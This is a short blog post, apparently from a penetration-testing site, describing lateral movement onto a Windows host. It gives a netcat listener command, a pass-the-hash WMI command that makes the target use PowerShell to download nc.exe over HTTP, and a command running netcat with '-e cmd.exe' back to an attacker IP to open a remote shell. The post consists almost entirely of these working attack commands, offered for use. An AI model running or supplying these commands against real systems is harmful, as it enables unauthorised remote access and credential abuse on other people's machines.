Oct 292019
 

This time, lets introduce a variant of previous article.

Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.download a file from internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

 

Poster un Commentaire

avatar

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

  S’abonner  
Notifier de